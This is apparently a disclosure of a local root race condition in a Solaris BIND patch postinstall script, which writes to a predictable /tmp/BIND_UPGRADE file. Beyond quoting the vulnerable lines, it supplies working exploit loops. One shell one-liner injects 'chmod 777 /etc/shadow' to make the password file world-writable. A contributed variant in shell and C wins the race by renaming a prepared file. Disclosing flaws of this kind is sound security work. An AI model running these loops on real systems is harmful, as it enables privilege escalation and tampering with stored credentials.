+= Local Root

If the system administrator is updating the system using update manager or smpatch (multi user mode) a race condition exists with the postinstall script for SUNWbindr that may lead to arbitrary code execution as root if the race is won.


vulnerable code in:

  ./patches/119784-22/SUNWbindr/install/pkg_postinstall: UPGRADE=${TMP}/BIND_UPGRADE
  ./patches/119784-22/SUNWbindr/install/postinstall: UPGRADE=${TMP}/BIND_UPGRADE

vulnerable code:

  UPGRADE=${TMP}/BIND_UPGRADE
  rm -f $UPGRADE

  (If I create the file first between these two steps, I should have ownership before it is over written and inject malicious code to get root.)

  cat >> $UPGRADE <<-\_UPDATE_START_METHOD
  oset=$@ # Remember current options if any.
  svc="svc:network/dns/server"
  if [ -z "$TMP" ]; then
TMP="/tmp"
  fi

If the following is run:

while (true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" > /tmp/BIND_UPGRADE; done

during patch installation you can get /etc/shadow world writeable.

Vladz suggested:

Another approach to exploit this is to place your evil command in a file
called /tmp/BIND_UPGRADE.new, and loop the move command.

$ while ! mv /tmp/BIND_UPGRADE.new /tmp/BIND_UPGRADE 2>/dev/null; do continue; done

or in C:

while (rename("/tmp/BIND_UPGRADE.new", "/tmp/BIND_UPGRADE") != 0) continue;

I am telling this because I think that moving a file takes less syscalls
(one at least) than a "echo string >> file" that open(), write() and
close() the file.